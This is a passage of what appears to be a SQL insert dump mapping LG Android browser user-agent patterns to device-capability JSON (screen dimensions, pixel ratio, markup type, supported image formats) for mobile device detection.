Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; LG-D850) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 5.*; LG-D852) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 5.*; LG-D855) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; LG-D858HK) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; LG-F320S) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; LG-F500K) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; LG-F500L) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; LG-F500S) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; LG-F560K) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; LG-F620K) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; LG-F620L) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; LG-F620S) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; LG-F670K) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; LG-F670L) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; LG-F670S) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; LG-H320) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; LG-H324) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; LG-H326) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; LG-H340) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; LG-H340AR) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; LG-H340n) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 5.*; LG-H340n-orange) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 5.*; LG-H340n/V10d) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 5.*; LG-H340n/V10e) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 5.*; LG-H342) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; LG-H343) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; LG-H345) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 5.*; LG-H410) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; LG-H420) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; LG-H422) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; LG-H440) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; LG-H440AR) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; LG-H440n) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; LG-H440n-orange) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 5.*; LG-H443) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; LG-H500) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; LG-H502) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; LG-H520) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; LG-H522) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; LG-H525) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; LG-H525n) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; LG-H525n-orange) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 5.*; LG-H525n/V10c) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 5.*; LG-H525n/V10d) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 5.*; LG-H540) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; LG-H634) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; LG-H635) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; LG-H636) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 5.*; LG-H650) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; LG-H731) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; LG-H735) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; LG-H736) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 5.*; LG-H810) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; LG-H815) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; LG-H818) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 5.*; LG-H818N) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; LG-H900) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; LG-H955) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; LG-H959) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 5.*; LG-H960) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 5.*; LG-H961N) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 5.*; LG-H962) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; LG-K120) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; LG-K121) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; LG-K130) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; LG-K330) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; LG-K410) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; LG-K420) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; LG-LS980) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; LG-V490) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_lg','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":960,\"pixelRatio\":1.33333,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 5.*; LG-V700) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_lg','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; LG-X150) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; LG-X155) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; LG-X165g) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; LG-X170fTV) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; LG-X170g) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; LG-X180g) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; LG-X190) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; LG-X210) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; LG-X220) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; LGL18VC) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; LGL33L) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; LGL44VL) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; LGL51AL) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; LGL52VL) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile 